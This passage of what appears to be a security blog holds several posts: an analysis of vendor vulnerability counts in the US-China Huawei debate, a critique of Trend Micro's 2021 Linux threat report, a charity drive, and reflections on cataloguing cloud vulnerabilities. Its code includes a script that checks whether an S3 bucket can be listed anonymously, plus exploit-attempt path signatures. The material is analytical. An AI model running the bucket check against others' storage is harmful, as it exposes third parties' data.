Computer equipment that poses a risk in the context above typically brings to mind computer vulnerabilities; issues that, with the right knowledge, would allow one country to compromise assets in the adversary nation’s government, business, or infrastructure. Another common scenario brought up by security professionals and intelligence officials is that of a backdoor: computer code planted by a party that allows them, and only them, covert remote access to the device. Some members of the U.S. intelligence community would prefer these Chinese products not be used in the technological infrastructure, saying their use “would undercut the ability of the U.S. to defend itself.”

This fear, specifically of Huawei routers from China, has been front-and-center since 2011, and a growing concern even before that. In the past, the concerns largely stemmed from each nation compromising the other’s computer networks in government and business. More recently, with the race to implement a 5G network, security issues around that technology have been heavily scrutinized. This war of technology has reminded us of 2010, when Huawei published an open letter to the U.S. government attempting to allay fears and shift public perception after a decade of suspicion. The company went so far as to request a “thorough investigation” to prove that they are “a normal commercial institution and nothing more.” This prompted eight U.S. senators to urge the White House to examine Huawei contracts and the House Intelligence Committee to investigate and publish a report on both Huawei and ZTE.

Ultimately, that report was inconclusive and stated the following – “despite hours of interviews, extensive and repeated document requests, a review of open-source information, and an open hearing with witnesses from both companies, the Committee remains unsatisfied with the level of cooperation and candor provided by each company.” Even over six years later, in 2019, Adam Segal, director of the Digital and Cyberspace Policy Program at the Council on Foreign Relations, officially stated that no one has found a backdoor in a Huawei product.

This is important to note, given the considerable scrutiny Huawei has received. In addition to their open letter in 2010, Huawei also disclosed their source code to a foreign government, something no U.S. company has done. Despite numerous information security organizations attempting to find and potentially publish findings of an actual backdoor (including the NSA and specifically created testing centers in the UK), none have been confirmed. The fact that the U.S. National Security Agency (NSA) has a significant budget and a vested interest in determining whether a company like Huawei is shipping backdoored systems, yet has not disclosed one, is compelling.

Ignoring Backdoors and Looking at the Data: Is a Ban Warranted?

Given that history and perspective on the growing tech war between the U.S. and China, we at Risk Based Security wanted to look at some concrete numbers around the vulnerabilities in the companies at the center of the issue.

While much of the focus on this topic has been on fear and the threat of backdoors planted by a vendor at the behest of their government, that is not necessarily where we want to direct attention. Using a backdoor, even if it is well-hidden, would likely bring unwanted attention by giving more positive attribution to those who compromised the machine. Nation-state level hackers would have their own ways into a wide variety of vendors and devices purely based on ‘natural’ vulnerabilities in the code. They simply do not need the access, and risk, a backdoor provides. Why provide hints to the enemy that you’ve “cracked the code” when you could hide behind an existing vulnerability?

Setting aside the possibility of backdoors, the question we’re interested in is this: does one of the government-used devices pose more of a risk due to its vulnerabilities? However, we have found that the “war on tech” cannot be simplified into the classic “how many vulnerabilities are there in…” question, or else unspoken bias drastically affects the perceived meaning of the numbers. While there is no way to do a perfect one-to-one comparison of U.S. versus Chinese vendors, there may be some that we can begin to compare, with disclaimers.

Phones: BlackBerry vs. Huawei / ZTE

For the general public, and based on much of the mainstream media reporting, Huawei is predominantly associated with their mobile phones. As more of our lives move to mobile, it is no surprise that those in power are concerned about the security of their phones and tablets. For the U.S. and Chinese governments, it is widely viewed that BlackBerry and Huawei / ZTE phones, respectively, are dominant. BlackBerry announced a five-year deal for their latest handheld and their AtHoc software with the federal government back in July 2016, specifically the Department of Defense (DoD) Joint Emergency Mass Notification Systems (JEMNS). According to the press release, the DoD chose BlackBerry because of the “secure end-to-end mobility offering .. that [shows the] secure platform is designed to meet their priorities”.

Despite the contract, BlackBerry is not the most widely used phone in the U.S. government. The U.S. Senate officially “ditched” BlackBerry in 2016, but allows them to continue to use specific devices per an official memo. In fact, BlackBerry themselves have stopped making their own handheld devices and have shifted to business software and other solutions like AtHoc, apparently used by 70% of federal employees including DoD, DHS, VA, DoE, DoA, PFPA, FEMA, IRS, and the TSA. For a majority of government employees, the most commonly used phones are now Apple and Samsung products.

With regards to China’s government, specific details about mobile phone adoption are not readily available. By simply looking at Huawei’s market share in China, one might safely assume that their devices are favored by some in the Chinese government. While it has long been rumored that Huawei has a very direct and complicated relationship with their government, which is supported both by Vietnamese academic and U.S. government research, Huawei says their relationship with the government is “no different” than that of any other company in China.

The U.S. government officially uses a mix of BlackBerry, Apple, and Samsung (Android), meaning that there are three major vendors and three major operating systems. For the Chinese government, apparently there is no officially sanctioned device, but it is very likely Huawei (formerly Android, but moving to Harmony OS / Hóngméng in 2020) and ZTE (Android) phones are heavily used. Looking at the last three calendar years, here is a comparison between the vendors to see how many vulnerabilities have been posted:

With these numbers it may seem like BlackBerry represents more risk. However, if BlackBerry shares the same vulnerabilities as any other Android device, and they disclose vulnerabilities in applications they ship, that number can be higher. The same can be said for any other Android phone that ships with packaged vulnerable apps and components, so the 1,338 Android vulnerabilities are not a full representation of other devices (e.g. Samsung, Huawei, ZTE). We then have to remind readers that comparing open source software such as Android to closed source such as BlackBerry OS and Apple can introduce bias in disclosure numbers. Another aspect to consider is that the number of devices in use may influence how many people are actually performing security research on them.

Ultimately, this means neither the U.S. nor China can justify banning devices based on phone vulnerability history alone. Trying to state that one vendor is more “vulnerable” than the other using currently available vulnerability data requires so many disclaimers that the end result loses its potency.

Routers & TelCom: Huawei vs. Cisco et al

The second major aspect of concerns over technology from one country being pervasive in another is that of access. Everyone from the carriers to end users expects the equipment to function seamlessly, giving us access to the internet and mobile service. That service is built on a complex infrastructure of telecommunications (telecoms) hardware and software produced by companies such as Huawei, Cisco, Fujitsu, Nokia, and Ericsson. The telecom hardware includes routers, base transceiver stations, fiber optical networks, satellites, and a lot more. As of 2017, Chinese companies produced the most telecom equipment in the world, about 14% more than the United States.

Looking at these vendors for the last four calendar years, we get another lesson in how significant bias is introduced into vulnerability statistics by disclosure practices. Cisco had 2,227 vulnerabilities in that time. Compared to Huawei with only 813, one might conclude that Cisco’s software is inherently riskier. But compare Cisco with the three other companies. Fujitsu enjoys 79% of the market share by revenue, yet only had 24 vulnerabilities in that time frame. Going off that logic, can we conclude that Fujitsu is the most secure?

Consider that of Fujitsu’s 24 vulnerabilities, only three are in their own products, and one of those is in a keyboard. The other 21 vulnerabilities are in third-party software or hardware (e.g. Intel processors). Cisco, on the other hand, has an incredible number of vulnerabilities reported, but they rarely publish that they are affected by vulnerabilities in, for example, OpenSSL and Intel, despite using those technologies in some of their devices.

Both Cisco and Fujitsu maintain contact pages for reporting security vulnerabilities, have a formal PSIRT team to respond to vulnerability reports, and both publish security advisories. Despite this, they have public disclosure histories that are about as opposite as you can find in many ways. We know for a fact both companies use hundreds of third-party libraries in their code, yet neither publishes when third-party vulnerabilities affect their software. Based on our extensive history of tracking vulnerabilities, we are quite certain that Fujitsu products have, or have had, more vulnerabilities than they have officially disclosed. Any notion that Fujitsu (24) is a one-off situation can be dismissed when looking at Nokia (11) and Ericsson (8) for the same period. That suggests Cisco and Huawei are the outliers.

We can apply this same scrutiny to Huawei, with only 813 vulnerabilities despite their large market share, and their considerable transparency when it comes to third-party vulnerabilities. In the world of vulnerability research, access to software and equipment is essential, of course. Some may argue that Huawei equipment isn’t readily available to many researchers, and that might be true for U.S.-based researchers. But the last decade has shown an incredible number of extremely talented security researchers in China, who would presumably have more access. If one were to argue that China is looking to restrict vulnerability disclosure, that certainly will be something to consider moving forward. However, that plan is still preliminary and has not been implemented.

Conclusion: Overkill

You need comprehensive, detailed, and actionable data in order to make informed decisions. Following this mantra, we are comfortable in assessing that with the currently available vulnerability data, a hard stance condemning either side is not possible. As much as we would like it to be, the comparison of vulnerabilities between vendors cannot be a panacea.

That being said, does this mean that both the U.S. and Chinese governments are banning each other’s products solely for political posturing, or is it actually an informed decision? As we can see, it may be easy to arrive at a conclusion when looking at the data. But as informed citizens we all need to be aware of the disclaimers and hidden perspectives that the data may not overtly reveal. The answer is not so simple as “well, this has more vulnerabilities than that”.

Without concrete evidence of backdoors in Huawei products, the concern is definitely valid, but a total ban is overkill and may have far-reaching unintended consequences. As the “war on tech” has raged on, both the U.S. and China have suffered casualties.

Commentary on Trend Micro’s Linux Threat Report 2021

On August 23, 2021, Trend Micro released a report titled “Linux Threat Report 2021 1H” by Magno Logan and Pawan Kinger. The report is based on Trend Micro’s Smart Protection Network (SPN), which they call “the data lake for all detections across all Trend Micro’s products“. Basically, every security product they make that detects vulnerabilities and reports them back to Trend Micro can be, and is, used in research like this, among other things. They further qualify that the report is based on additional data “collected from honeypots, sensors, anonymized telemetry, and other backend services” and represents “the real-world prevalence of malware and vulnerability exploitation across enterprises” regardless of size or vertical.

Reports that talk about the most exploited vulnerabilities are compelling. They offer a short list of vulnerabilities that organizations can make absolutely sure they have patched, removing known risk. Unfortunately, many of these reports have problems. I have written about some before, including the 2015 Verizon DBIR, the 2016 Verizon DBIR, and Radware’s Top Web Exploits of 2020. I wish I had more time, as I have seen other reports on exploit prevalence with similar issues. In this case, Trend Micro’s report falls into at least one of the same traps as these prior reports.

The first issue that pops out is the wording in the report that introduces a major point of confusion. In section two, titled “The Linux threat landscape: What are the top Linux threats?“, under the second heading titled “Vulnerabilities in Linux systems“, we get more details qualifying where the data came from to generate this part of the report:

“… we dissected IPS (Intrusion Prevention System) hits from Trend Micro Cloud One – Workload Security and sifted through over 50 million events, ignored false positives, eliminated test data, and layered data with available threat intel to draw some conclusions.”

Unfortunately, the next sentence immediately introduces some doubt, and we don’t know how much doubt because they don’t qualify their margin of error:

“It should be noted that there can be a degree of error here due to the nature of the data and internet activity.”

If the margin of error is 1% in a dataset that large, it’s not a big deal. If it is 10%, that can be problematic. If it is 50%, then the report shouldn’t have been written at all. Apparently we get to guess where that margin of error falls.

Now, for the section of the report that initially got my attention, we get to the top 15 vulnerabilities. I can’t finish that sentence because there is confusion:

If a list of vulnerabilities includes the top 15 that are “actively exploited” or “have a known proof of concept”, how do you even? Over 4,500 vulnerabilities in 2021 H1 have a public proof-of-concept or functional exploit. The next sentence clearly repeats the exact same thing. I can’t figure out how to explain that second part unless they are attempting to say “actively exploited and a public proof of concept” to distinguish from exploitation that is happening where the exploit is not actually published. That seems like a pretty big oversight given the nature of this section of the report. Further, it doesn’t qualify whether the report is based on attempted exploitation that matches a signature or successful exploitation. After the table of vulnerabilities the report says “Table 1 shows the top vulnerabilities by volume of triggers.”, which strongly suggests it is counting exploit attempts. But that just leads to more questions like “if you see an attempt for that vulnerability but against a Windows server, does it count?”

It gets even murkier looking at the table of the 15 vulnerabilities where one of them is listed as “N/A” for severity. That warrants digging into their list more closely and comparing the vulnerability information with that in VulnDB.

There are several observations to be made for this list:

  • CVE-2017-9805 is listed as ‘High’ severity suggesting they pulled at least some vulnerability data from the National Vulnerability Database. They score the vulnerability 8.1 (High) while VulnDB and CERT VU scores it 10.0. Looking at the original disclosure, there are no obvious qualifications that seem to justify an Access Complexity High (AC:H) rating.
  • Of the 430 vulnerabilities involving WordPress, base or plugins, that allow for remote code execution, why did only one make the list (CVE-2020-25213), and why that one? Given the amount of scanning for vulnerable WordPress installations I would expect more to be on the list. Hell, even the venerable CVE-2013-4338 given there are other CVE-2013s on the list.
  • The Atlassian Jira vulnerability is very curious given that it is a remote information disclosure issue and does not disclose sensitive information such as a password, that would result in further privilege escalation. Based on the logs of attrition.org over the last three months, there has been a single request for /secure/QueryComponent!Default.jspa. There have been five requests for /secure/QueryComponentRendererValue!Default.jspa (CVE-2020-36289) which is another information disclosure issue. There are also hundreds of information disclosure vulnerabilities that yield credentials which can be used to authenticate to an application to gain privileges. I would expect to see any one of those on the list before CVE-2020-14179.
  • Eclipse Jetty (CVE-2017-7657) is very curious to see on this list for several reasons. First, it is a four-year-old vulnerability that does not result in code execution. Second, there is a caveat for exploitation, as explained in the Eclipse bug ticket: if Jetty "was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary". To see an HTTP request smuggling issue that widely exploited, over the thousands of other vulnerabilities that allow for a more serious impact in software found running on Linux, is baffling. This strongly suggests the detection rule for that vulnerability is overly broad and triggers on exploit attempts for different issues.
  • The nginx vulnerability is listed as N/A, which is curious. Looking at the associated NVD entry (CVE-2013-4547), we see it has a CVSSv2 score but not a CVSSv3 score. That is due to it being a 2013 vulnerability and NVD not retroactively scoring all older vulnerabilities. This, along with CVE-2017-9805, tells us that Trend Micro imported the scores from NVD but didn't adjust for this one, either by falling back to the CVSSv2 score or by developing their own CVSSv3 score. It seems odd to blindly use the CVSSv3 scores and ship incomplete data when it is a simple correction to make.
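
To make the first bullet concrete, here is a minimal sketch of the CVSSv3.1 base score arithmetic (weights straight from the CVSSv3.1 specification, not any vendor's tooling) showing that the Attack Complexity rating is the only thing separating NVD's 8.1 from a 9.8:

```python
# Minimal sketch: CVSSv3.1 base score for CVE-2017-9805 under both Attack
# Complexity ratings. Metric weights come from the CVSSv3.1 specification.
from math import ceil

def roundup(x):
    # CVSS "round up": smallest value, to one decimal place, >= x
    return ceil(x * 10) / 10

def base_score(ac):
    av = pr = ui = 0.85            # AV:N, PR:N, UI:N
    c = i = a = 0.56               # C:H, I:H, A:H
    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    impact = 6.42 * iss            # Scope: Unchanged
    exploitability = 8.22 * av * ac * pr * ui
    return roundup(min(impact + exploitability, 10))

print(base_score(0.77))  # AC:L -> 9.8
print(base_score(0.44))  # AC:H -> 8.1, the score NVD published
```

Everything else in that vector is already maximal, so the debate over this entry really is a debate over that single AC metric.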

Looking back to bullet #3, it's interesting to compare the handful of hits seen on our web server with the 10,659 requests for /wp-login.php we observed in that same period. This, I think, illustrates a serious flaw in the methodology of this report. Most of the scanning we see for vulnerable WordPress instances first looks for the presence of the software before attempting to exploit anything. Rather than throw hundreds of payloads for various flaws in the core software and vulnerable themes or plugins, it's more efficient to check if the software is present first, building a list of sites running WordPress before launching more significant attacks that may attract attention.
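
As a rough illustration of that distinction, here is a hypothetical tally (the log filename, and treating wp-file-manager requests as CVE-2020-25213 attempts, are my assumptions) separating presence probes from actual exploit payloads in a web server access log:

```python
# Hypothetical sketch: count WordPress presence probes vs. exploit payloads
# in a combined-format access log. Paths are illustrative assumptions.
import re
from collections import Counter

RECON_PATHS = ("/wp-login.php", "/xmlrpc.php")   # "is this WordPress?"
EXPLOIT_HINTS = ("wp-file-manager/lib/php/connector.minimal.php",)  # CVE-2020-25213

counts = Counter()
with open("access.log") as log:
    for line in log:
        match = re.search(r'"(?:GET|POST|HEAD) (\S+)', line)
        if not match:
            continue
        path = match.group(1)
        if any(p in path for p in RECON_PATHS):
            counts["recon"] += 1
        elif any(h in path for h in EXPLOIT_HINTS):
            counts["exploit"] += 1

print(counts)  # recon probes typically dwarf actual exploit payloads
```

A signature-based report that only counts the second bucket will badly undercount attacker interest in WordPress.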

As always, a real test of the veracity of this data would be for another firm that does large-scale monitoring of attacks to publish their own data, limited to the same approximate criteria as Trend Micro. That might explain bullet #4 at the very least.

Niki7a vs Magen – Charity Drive

Like the epic Rumble in the Jungle, it started with a quick offer to throw money to charity on behalf of their suffering, and other generous souls jumped in to do the same. The result? Niki7a and Magen are now locked in a legendary contest to see who can wear their DEF CON 29 bracelet the longest. Whoever wears the bracelet the longest gets to pick the charity we donate to. Magen has opted to have donations go to SailFuture, "a comprehensive child welfare agency, and private school based in St. Petersburg, Florida" whose mission is "to innovate and develop effective programs for high-risk youth, particularly youth in foster care." At the time of this blog, Niki7a is still deciding.

Image courtesy @drwolfff

This started out with Niki7a's innocent Tweet:

Magen qualified that there are challenge coin rules to keep each other honest:

With all of the people kicking in to donate, I will maintain a spreadsheet to track pledges and totals!

Reflections on “CVE Approach for Cloud Vulnerabilities”

At Black Hat Briefings USA this week, Ami Luttwak and Shir Tamari called for a "CVE" style approach to documenting vulnerabilities that affect cloud offerings (note: I have not seen the talk). As one of two people (the other being Jake Kouns) that may have the longest history in this specific space, I wanted to give some history and very high-level reflection on the challenges and benefits of this endeavor. First, for perspective, CVE covers at least 56 pure cloud / site-specific vulnerabilities, the first going back as far as 2000. It covers at least another 461 that affect hosted blockchain contracts. At times, some of the CVE (Editorial) Board has advocated for CVE to expand to cover cloud vulnerabilities while others have argued against it. At least one advocate said cloud vulnerabilities should get CVE IDs, while others, both for and against coverage, said that if cloud was covered, it should get its own ID scheme. MITRE has not made a clear policy change on that in years, despite increasing coverage, primarily of hosted blockchain contracts.

Next, the idea of "CVE for Cloud" has been done! Well, it was attempted at least. Back in the day, the Open Security Foundation was desperately trying to maintain the Open Sourced Vulnerability Database (OSVDB) and DatalossDB. Neither project had enough volunteers, and community support simply wasn't there. Despite that, in 2010 we spun up a project called Cloutage (archive.org link) that aimed to catalog cloud vulnerabilities as well as instances of cloud service outages. The idea was that this would tell companies which providers actually had the alleged 99.999% uptime, which regions of a provider were more prone to issues, and more. We had been collecting incidents categorized as "hack", "outage", or "vuln" long before that with such a project in mind, but that is when we finally made them publicly available in an organized fashion. So my reflections come with real-world experience; the challenges we faced, along with the pitfalls of such an endeavor, are still largely present. (For convenience, I will use the term 'cloud' to refer to service providers that are subscription offerings and not on-premises hardware / solutions.)

First, let's begin with one significant change from the mid-2000s to today. Over ten years ago, a vulnerability in a cloud provider was typically an issue the provider had to fix, entirely out of the customer's control. While that is still prevalent today, we now see another class of cloud vulnerabilities that better warrants a "CVE for Cloud" approach: cases where a vulnerability is present in a cloud offering and requires the customer to mitigate it themselves. These are often described as misconfigurations, like the pervasive open S3 buckets that can be accessed without credentials, disclosing a world of information or hosting malicious software [1] [2] [3]. There is a fundamental difference between a security issue the customer must mitigate and one where they must wait for the cloud provider to fix it.
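
For that customer-mitigated class, detection is often something a customer, or anyone else, can do from the outside. A minimal sketch, with a placeholder bucket name, of checking whether a bucket allows unauthenticated listing via boto3:

```python
# Minimal sketch: does an S3 bucket allow anonymous listing? The bucket name
# below is a placeholder, not a real target.
import boto3
from botocore import UNSIGNED
from botocore.config import Config
from botocore.exceptions import ClientError

s3 = boto3.client("s3", config=Config(signature_version=UNSIGNED))  # no credentials

try:
    resp = s3.list_objects_v2(Bucket="example-target-bucket", MaxKeys=5)
    print("World-listable; sample keys:")
    for obj in resp.get("Contents", []):
        print(" ", obj["Key"])
except ClientError as err:
    print("Anonymous listing denied:", err.response["Error"]["Code"])
```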

Historically, when the vast majority of security issues fell into the "wait for the provider to fix" category, we cataloged those vulnerabilities but questioned the value. Sure, it had value in that a company could evaluate cloud providers to see which had more vulnerabilities and, sometimes, how long fixes took. But even that was crippled because companies would only announce an issue after it was fixed. That meant we knew a vulnerability had been present for some undetermined time and was then patched. But cloud providers weren't disclosing how long customers had been exposed, and most providers simply were not disclosing at all. So the database held a fraction of the actual vulnerabilities, typically with no known exposure window, and customers were powerless to do anything about them.

Another issue we ran into was that, on the rare occasions a cloud provider disclosed an issue, the disclosure was extremely vague. More frustrating was when they used language implying that some, but not all, customers were impacted. They didn't include regions, IP ranges, or anything else to identify who was affected, so a customer couldn't even confirm they were in the clear without opening a support ticket and hoping for an honest answer. That was frustrating and not very helpful. How will security teams cope if they find out there is a public vulnerability in a cloud offering and no mitigating control? Seems like a recipe for stressful days. Of course, it's no different than now, except that today ignorance is bliss.

CVSS is the de facto risk scoring framework for vulnerabilities. It was designed around vulnerabilities that appear in CVE, which is predominantly on-premises software. Would CVSS scale to work for cloud vulnerabilities? CVSSv2 seems like it would be as suitable for cloud as for on-premises software, given its simpler scoring elements. CVSSv3 seems like it could be more problematic and not take advantage of some of its changes over v2. First, the 'physical' attack vector would effectively be eliminated. Second, would Authorization Scope be neutered? Defined initially as the "ability for a vulnerability in one software component to impact resources beyond its means, or privileges", on the surface it seems like every vulnerability would have to be evaluated more closely for scope change. Every vulnerability potentially causes the cloud provider, a different company than the one using the service, to get involved in some way. The cloud provider's support and security teams spending time because $CompanyA's instance got popped technically "impacts resources beyond its means". I don't think that is what the CVSS SIG had in mind, though. That said, given the shared environments of many cloud offerings, sandbox escapes and lateral movement potentially impact completely different organizations. Does a simple "scope changed" modifier to a score adequately convey the potential risk?
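
To put a number on that question, a quick sketch using the CVSSv3.1 spec weights (again, my own arithmetic, not anyone's official scoring) shows that flipping Scope on an otherwise-maximal network vector moves the base score only from 9.8 to 10.0:

```python
# Minimal sketch: CVSSv3.1 base score with Scope Unchanged vs. Changed for
# AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H. Formulas and weights from the CVSSv3.1 spec.
from math import ceil

def roundup(x):
    # CVSS "round up": smallest value, to one decimal place, >= x
    return ceil(x * 10) / 10

def base_score(scope_changed):
    av, ac, pr, ui = 0.85, 0.77, 0.85, 0.85
    c = i = a = 0.56
    iss = 1 - (1 - c) * (1 - i) * (1 - a)
    exploitability = 8.22 * av * ac * pr * ui
    if scope_changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
        return roundup(min(1.08 * (impact + exploitability), 10))
    impact = 6.42 * iss
    return roundup(min(impact + exploitability, 10))

print(base_score(False))  # S:U -> 9.8
print(base_score(True))   # S:C -> 10.0
```

A 0.2 bump is the most "scope changed" can express here, which seems thin for a flaw that could cross tenant boundaries.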

Finally, who's going to run this "CVE for Cloud"? OSVDB and subsequent similar projects give a damning history showing there is a lot of vocal support for community-run vulnerability resources, but those vocal folks very rarely put in the actual time required. If it is run by one person or a small group of dedicated volunteers, how long before they burn out or commercialize it? There's a reason most of the public VDBs have gone away or gone commercial to varying degrees (e.g. OSVDB, Secunia, BID). The only thing worse than such a project not getting off the ground is one that does, becomes an essential part of security programs, and then goes away.

I look forward to seeing the talk by Luttwak and Tamari, if it is made public. I'm curious whether they have come up with solutions to the problems that have plagued vulnerability databases for over two decades.

[Update: Josh Bressers points out that the Cloud Security Alliance (CSA) wants to address this problem too.]